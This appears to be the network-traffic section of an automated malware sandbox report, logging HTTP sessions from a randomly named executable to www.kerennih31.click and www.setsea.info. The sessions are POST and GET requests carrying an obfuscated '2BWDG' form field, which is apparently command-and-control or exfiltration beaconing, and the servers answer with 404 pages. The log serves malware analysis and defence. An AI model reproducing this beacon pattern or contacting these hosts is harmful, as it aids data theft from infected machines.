                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 48 43 69 6d 37 6f 72 30 65 6c 4e 4f 58 53 73 42 35 52 45 38 31 68 44 2f 5a 4c 2b 4c 63 69 61 6c 6b 35 78 57 38 6d 42 41 6b 31 2b 76 4c 2f 59 68 49 79 74 67 4f 75 50 73 50 30 4a 33 4f 70 58 4e 4c 48 6d 63 6c 70 6c 63 42 54 64 55 50 6e 72 4d 6c 71 45 57 36 69 61 78 43 5a 65 41 7a 69 6c 61 6e 42 43 4a 2b 4e 44 79 56 35 7a 72 52 53 39 79 6c 51 70 4f 53 6a 62 30 44 65 38 34 35 36 4f 77 41 6c 30 56 44 4f 51 34 38 42 4b 47 77 61 74 6a 61 71 65 41 4a 6b 73 50 79 4f 6a 4d 64 6c 6c 66 64 4d 77 41 37 6a 6b 37 6d 61 63 34 46 57 70 75 31 78 76 48 51 4d 35 64 56 2b 52 59 76 57 4b 32 42 56 42 43 45 51 78 30 6a 79 76 30 43 42 76 4c 54 46 76 39 32 53 49 3d
                                                                                                                            Data Ascii: 2BWDG=HCim7or0elNOXSsB5RE81hD/ZL+Lcialk5xW8mBAk1+vL/YhIytgOuPsP0J3OpXNLHmclplcBTdUPnrMlqEW6iaxCZeAzilanBCJ+NDyV5zrRS9ylQpOSjb0De8456OwAl0VDOQ48BKGwatjaqeAJksPyOjMdllfdMwA7jk7mac4FWpu1xvHQM5dV+RYvWK2BVBCEQx0jyv0CBvLTFv92SI=
                                                                                                                            Oct 19, 2024 12:57:36.075556993 CEST1033INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:35 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.449950104.223.44.195803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:38.022330046 CEST10977OUTPOST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 48 43 69 6d 37 6f 72 30 65 6c 4e 4f 58 53 73 42 35 52 45 38 31 68 44 2f 5a 4c 2b 4c 63 69 61 6c 6b 35 78 57 38 6d 42 41 6b 31 32 76 4c 4d 51 68 4b 56 35 67 4e 75 50 73 52 6b 4a 30 4f 70 58 51 4c 47 4f 59 6c 70 35 6d 42 56 42 55 4a 45 6a 4d 74 37 45 57 7a 69 61 78 64 4a 65 42 2b 43 6c 31 6e 42 53 4e 2b 4d 7a 79 56 35 7a 72 52 56 4e 79 67 31 4a 4f 55 6a 62 7a 45 65 38 43 71 71 4f 4d 41 68 59 72 44 4f 6b 4f 2f 79 43 47 77 36 39 6a 57 2f 79 41 42 6b 73 4e 78 4f 69 5a 64 6c 67 66 64 4d 73 6d 37 67 35 73 6d 59 41 34 42 6a 45 45 70 67 66 4e 42 64 49 41 47 76 78 74 73 30 32 42 4f 6d 4e 5a 4e 6a 31 71 34 6a 6e 4b 46 44 48 50 48 41 2b 35 76 6b 74 53 62 43 4f 53 70 6e 66 73 38 35 51 61 6d 78 79 63 4b 39 39 61 33 6e 6b 30 69 6a 78 52 70 2b 39 7a 6f 4e 32 72 70 2f 50 34 62 59 78 34 75 6e 6c 71 6c 6b 41 43 44 6b 66 4c 49 41 72 65 6b 79 58 6b 43 33 4a 39 79 38 46 4f 4a 47 55 75 33 64 44 44 5a 69 74 49 31 53 42 63 44 6a 50 46 67 57 70 4e 56 4e 52 59 48 49 6d 55 4e 38 58 6d 41 69 4c 58 42 54 6c 73 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=HCim7or0elNOXSsB5RE81hD/ZL+Lcialk5xW8mBAk12vLMQhKV5gNuPsRkJ0OpXQLGOYlp5mBVBUJEjMt7EWziaxdJeB+Cl1nBSN+MzyV5zrRVNyg1JOUjbzEe8CqqOMAhYrDOkO/yCGw69jW/yABksNxOiZdlgfdMsm7g5smYA4BjEEpgfNBdIAGvxts02BOmNZNj1q4jnKFDHPHA+5vktSbCOSpnfs85QamxycK99a3nk0ijxRp+9zoN2rp/P4bYx4unlqlkACDkfLIArekyXkC3J9y8FOJGUu3dDDZitI1SBcDjPFgWpNVNRYHImUN8XmAiLXBTlsfErWePBbTAGNjKtBAf6MkeIqGtV6dlf0sAiD56uuOpZq9+SnX5vTHc0urxG8LREdAA2B7sX5pigeMT1dDjp7h9joIDXhqAg2rgNMT9JY0HaLlGLyOHY8ZlvjUjFFLXVlbwSlayTp1kl9jgvN3Jun0kwhxQzEOWPO79K27vrOpr/zx1iburEyPJvmtAaWlquDLI7pJBvMNqcSXJ/CzVDgLtLSq5zs1uyiglaoqxYis6AfnVng2eKWNFhlIwSVEsOdP7R4+EDPw2/GA6va4iF2wu2lTjicywMmTTMwClBbzSe+QagCV/z5zGO0XCIsMMUqx1/XumpvVjz6W/fiDT3CmUhhUYEsU0bRg0Z76KL47BFQHAQwhE5aH/JltO094vI1dFzfL02I1GxirDP8PadPFIBYRscwqmXXiSsp73GpKyQKg6Sum4+S1sJoaglYsCZz3hxdTE59/8SICD8fzm7BUePOCym//CJ4RK82mRm4m7heUlfKJXER8/R9EmNeGTaUaHhuW+e+lC4wTpsRndq8DmJRdIju3k76w9B/Bci+P/37WYe2/zry5f9quyOufumY5/fOjMNRdCIjVmtMzc0XW4pHQ+2gfi+s7abEk5uFRHJQXWTe1MtQDG3GgN4KIzWw5DGW4H4Um1czMq2kpiF5XjVGtrmW520tCj [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:57:38.644953012 CEST1033INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:38 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.449965104.223.44.195803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:40.561228991 CEST599OUTGET /czzt/?2BWDG=KAKG4dTjIDwNH0df8gU76RPra4TcXDDcoeBE7DNk+h+PFOgCIDI8J8PfDl8Ob7fEK2PQwbhHJxVFGH/KvrYWkV/dbZ6zqApOmDyx5MnRXvHLaXYjnht+BzI=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:41.162436962 CEST1033INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:41 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.449996203.161.41.204803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:46.217314005 CEST860OUTPOST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 6b 7a 72 53 78 7a 47 67 4a 75 47 73 6a 4e 44 2f 6b 50 56 71 47 65 64 31 75 78 61 68 42 62 79 4f 4b 72 69 65 6c 6f 74 30 77 78 65 68 64 45 65 7a 71 57 39 73 62 49 42 4d 52 68 6f 68 53 34 79 72 44 6d 39 35 61 37 69 6b 50 67 4f 59 5a 31 34 53 52 66 38 6f 31 53 54 52 6f 30 76 62 6a 45 32 52 41 37 79 48 4c 55 65 64 77 4d 68 74 38 2b 39 42 36 30 51 6f 30 49 56 54 5a 4d 2f 47 62 76 79 6f 63 34 38 5a 77 41 46 2b 73 4f 51 32 62 52 37 4e 41 49 41 31 77 57 65 61 30 52 42 62 46 4c 50 52 44 36 61 5a 35 43 65 36 48 36 57 76 2b 70 59 2f 77 6f 4c 61 57 6d 62 61 62 66 72 78 32 75 6b 41 65 67 3d 3d
                                                                                                                            Data Ascii: 2BWDG=kzrSxzGgJuGsjND/kPVqGed1uxahBbyOKrielot0wxehdEezqW9sbIBMRhohS4yrDm95a7ikPgOYZ14SRf8o1STRo0vbjE2RA7yHLUedwMht8+9B60Qo0IVTZM/Gbvyoc48ZwAF+sOQ2bR7NAIA1wWea0RBbFLPRD6aZ5Ce6H6Wv+pY/woLaWmbabfrx2ukAeg==
                                                                                                                            Oct 19, 2024 12:57:46.878372908 CEST896INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:46 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.450012203.161.41.204803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:48.768079042 CEST880OUTPOST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 6b 7a 72 53 78 7a 47 67 4a 75 47 73 68 6f 4c 2f 6d 6f 70 71 53 4f 64 30 68 52 61 68 4f 37 79 4b 4b 72 75 65 6c 70 5a 6b 6c 54 71 68 61 6b 75 7a 72 55 46 73 63 49 42 4d 5a 42 6f 6f 63 59 79 38 44 6d 77 5a 61 2b 4b 6b 50 67 4b 59 5a 77 45 53 52 73 6b 72 30 43 54 50 6e 55 76 64 73 6b 32 52 41 37 79 48 4c 55 4b 7a 77 49 31 74 38 4b 35 42 36 51 45 72 71 59 56 51 50 38 2f 47 66 76 7a 6a 63 34 39 4d 77 43 68 48 73 49 55 32 62 56 7a 4e 44 61 6b 71 36 57 65 63 70 42 42 4a 47 34 79 76 4d 66 6e 70 32 79 33 59 59 4f 69 32 79 50 4a 6c 68 5a 71 4e 45 6d 2f 70 47 59 69 46 37 74 5a 4a 46 74 70 5a 44 54 31 41 64 77 66 6b 4a 38 75 72 76 75 55 54 64 6e 34 3d
                                                                                                                            Data Ascii: 2BWDG=kzrSxzGgJuGshoL/mopqSOd0hRahO7yKKruelpZklTqhakuzrUFscIBMZBoocYy8DmwZa+KkPgKYZwESRskr0CTPnUvdsk2RA7yHLUKzwI1t8K5B6QErqYVQP8/Gfvzjc49MwChHsIU2bVzNDakq6WecpBBJG4yvMfnp2y3YYOi2yPJlhZqNEm/pGYiF7tZJFtpZDT1AdwfkJ8urvuUTdn4=
                                                                                                                            Oct 19, 2024 12:57:49.461445093 CEST896INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:49 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.450018203.161.41.204803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:51.334908009 CEST10962OUTPOST /w90v/ HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.setsea.info
                                                                                                                            Referer: http://www.setsea.info/w90v/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
